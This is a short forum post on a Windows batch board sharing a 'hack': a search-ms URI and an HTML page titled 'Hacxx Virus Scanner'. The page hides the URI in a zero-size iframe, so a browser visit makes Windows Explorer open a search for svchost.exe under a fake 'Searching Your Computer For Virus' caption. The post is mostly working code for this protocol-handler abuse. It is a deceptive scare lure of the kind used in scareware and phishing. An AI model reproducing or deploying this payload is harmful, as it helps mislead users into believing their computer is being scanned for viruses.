Sharing a hack - Iframe Explorer.exe hack searching for svchost.exe

Discussion forum for all Windows batch related topics.

Moderator: DosItHelp

Post Reply
Message
Author
hacxx
Posts: 57
Joined: 09 Apr 2015 13:18

Sharing a hack - Iframe Explorer.exe hack searching for svchost.exe

#1 Post by hacxx » 18 Dec 2021 12:44

Iframe Explorer.exe hack searching for svchost.exe

The name is self-explanatory "check code".
(Can not be executed in command line).

Code: Select all

search-ms:displayname=Searching%20Your%20Computer%20For%20Virus%20(C%3A)&crumb=System.Generic.String%3Asvchost.exe&crumb=location:C%3A%5CWindows%5Csystem32
(The code below will start a search from almost any browser).

Code: Select all

<html>
<title>Hacxx Virus Scanner</title>
<iframe src="search-ms:displayname=Searching%20Your%20Computer%20For%20Virus%20(C%3A)&crumb=System.Generic.String%3Asvchost.exe&crumb=location:C%3A%5CWindows%5Csystem32" frameborder="0" width="0" height="0"></iframe>
</html>
Read more here:
http://www.cyberlord.at/forum/?id=10589&thread=113

Post Reply